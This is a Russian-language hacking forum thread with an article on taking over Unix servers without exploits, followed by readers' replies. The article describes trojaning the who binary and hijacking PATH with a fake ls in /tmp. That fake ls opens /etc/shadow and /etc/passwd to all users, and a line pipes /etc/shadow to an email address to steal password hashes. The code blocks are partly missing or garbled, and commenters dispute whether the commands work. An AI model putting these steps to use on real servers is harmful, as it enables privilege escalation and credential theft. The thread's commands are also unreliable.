![]() |
Захват никсов без сплойтов
Re Achat ;)
Бывает особо параноидальные админы удаляют с серваков компиляторы. Пытаемся установить гцц из рмп пакета... ааах облом он не работает -) Скомпиленные на других машинках сплоиты явно отказываются работать, ругаясь на сегоднящний дождь/жару и просто плохое настроение.. Что делать? вот и задумался.. пока не натолкнулся на одном из форумов на интерестную идейку, которая в принципе известна, но вот решил расписать ее поподробней.. Его может юзать как админ так и ты, c00l m3g4 h4x0r =) Итак приступим. Если брать в расчет админа, то ему провернуть все это намного легче, т.к. он уже "по условию задачи" обладает рутом ) Что проделываем хакер, проникая в систему? чаще всего юзает команды типа ls, last, who, id, which, uname и т.д. И основная задача админа в случае проникновения взломщика установить своеобразные ловушки на эти команды. Постойте, у нас же нет компилятора? Зато у нас есть руки =) Все можно проделать с помощью перля, питона или просто средстави нашых никсов. Возьмём к примеру who. Определим где она у нас находится следущим образом: Код:
which whoПрава на неё равны –rwxr-xr-x, что сопостовимо с 755. Переименовываем who например в who_new. Делаем это следующим образом: Код:
mv /usr/bin/who /usr/bin/who_newКод:
сhmod 755 /usr/bin/who_newКод:
сat /usr/bin/whoПервая и вторая строчка надеюсь понятна, третья же отправляет тебе на почту то, что выдала команда id с заголовком Your Base_Is_Under_Attack -) Ключ -n передает заголовок письма, -s запретит просмотр /etc/mail.rc, чтобы хацкер ничего не заподозрил. Этим способом можно подменить любую исполняемую программу, главное запомнить что и как менял , а лучше записать на бумажке -)) ---------------------------------------- Да, все отлично - скажите вы.. А как быть, если права у тебя не root, а жалкие nobody или обычного юзера? Работа с исполняемыми файлами в основном в таком случае запрещена. Но у нас есть еще один инструмент в арсенале - переменная окружения PATH Поэксперементируем с ls Допустим у нас есть права на запись в /tmp. Тогда создадим следущий файл под названием ls. Запишем в него следущие строчки: Код:
#! /bin/sh Код:
сhmod 777 /tmp/lsИтак теперь если у пользователя хватит прав на изменение прав (скорее всего у рута), то /etc/shadow и /etc/passwd откроются для всеобщего обозрения -) Можно вставить в нашу фэйковую ls что-то вроде cat /etc/shadow | mail your@mail (просто отсылает зашифровынные пароли на мыло). Вобщем тут можно делать все что хочешь) Единственное что может делать админ в этом случае - проверять переменную PATH, убрать ставящиеся по дефолту права,либо задавать полный путь до исполняемого фала, т.е. для просмотра содержимого каталога вводить каждый раз /bin/ls -lia.. Даже законченный параноик не будет этого делать... В статье мы научились захватывать сервак без использования палевных сплойтов, рушивших систему или просто не работающих =) Special For Achat (c) blackybr PS т.к. многим личностям оказалось непонятно, то поясняю.. для превого случаю нужен РУТ (т.к. по условию вы админ!) ДЛя второго нужен просто юзэр доступ! |
Молодец!!!
Мне понравилась твоя статья |
Накатал аж на + :)
Статья хорошая |
Хорошая статья!
|
Статья в норме, но можно и получше...
|
Цитата:
|
/usr/bin/who
/usr/bin/who_new |
нашел пока 1
mv вместо mw =) |
Вроде правильно так: mv usr/bin/who usr/bin/who_new
|
Я думаю, нерезус имел в виду, что во втором коде используется не /usr/bin/who_new, а /usr/bin/system_who, ну и конечто как уже сказал bl4ck-cat mv, а не mw, но ведь никто от ошибок не застрахован.
|
1. mw - mv
2. mv /usr/bin/who /usr/bin/who_new просто переименует файл /usr/bin/who на /usr/bin/who_new.. т.е правильней было бы cp /usr/bin/who /usr/bin/who_new. |
mv /usr/bin/who /usr/bin/who_lol
|
Для всего описанного в статье нужны права рута.
|
3 ошибки оказалось )
|
nerezus
хм... а файл .bash_profile разве нельзя подредактировать без рута? |
Рут нужен только для первго случая, а для изменения переменной path нужен гостевой дочтуп (иногда и нободи сойдёт) . Проверено и не один раз
|
с411k а нам и нужно ПРОСТО переименовать его
Цитата:
|
Цитата:
|
Гы для того что-бы переименовать who нужны права РУТА!
|
Угу, я это второй ошибкой и назвал.
|
Если нужна права рута то значить статья некудышная ?
|
То значит в ней нет смысла.
|
права рут нужны только для 1 случая с who
|
Вы читать умеете? РУТ нужен для ПЕРАОГО случая. Для воторого нужен обычный ЮЗЕР.
|
Если у меня будет рут доступ мне и так будет хватать )
|
Цитата:
|
2Tem первый спосбо для защиты сервера. Второй для взлома.
Спец для nezerus разделил способы с помощью "-------" |
Цитата:
|
nerezus сначала попрбуй потом говори.. у меня почему-то всегда хватало
|
Ну ты меня учить будешь?
nerezus ~ $ ls -la /root/.bash_profile ls: /root/.bash_profile: Permission denied nerezus ~ $ ls -la /etc/bash.bashrc -rw-r--r-- 1 root root 1546 2006-06-06 14:45 /etc/bash.bashrc |
Или даже немного подумай: предположим ты админ сервера, тебе не кажется, что разрешать изменять файл - это глупость? ))
|
по дефолту он всегда разрешен на запись
|
blackybr - заблуждаешься... Вчера тоже тестил на 10 серваках.... как я и ожидал послали меня в Пермисион =) так что Статья некудышная!
|
2limpompo тестил на 3х серваках =) естесно не на своих... у меня все работало
зачем мне откровенный бред писать |
Анука видео сними... а то не верится....
|
Ага мне тоже не вериться что запись присутсвует !
если админ нормальный то у тебя прав даже на ту деректорию не хватит чтоб посмотреть что там. 2Автор как уже выше сказал лимп сними видео а мы посмотрим. |
ДА ещё поправка... если можно то на 2-3 серваках.... проделай это....
|
[br@+++]$ cat .bash_profile
# .bash_profile # Get the aliases and functions if [ -f ~/.bashrc ]; then . ~/.bashrc fi # User specific environment and startup programs PATH=$PATH:$HOME/bin BASH_ENV=$HOME/.bashrc USERNAME="***" export USERNAME BASH_ENV PATH вот тот юзер который под звездами прописан и может выполнять все это.. на 8ом рэдхэте и фк4 у меня там по дефолту гест Упирается все естественно в непутевость админа, не изменившего доступ |
Видео всё равно сними !
|
никогда видео не снимал.. если получится то будет вам видео :)
|
| Время: 17:11 |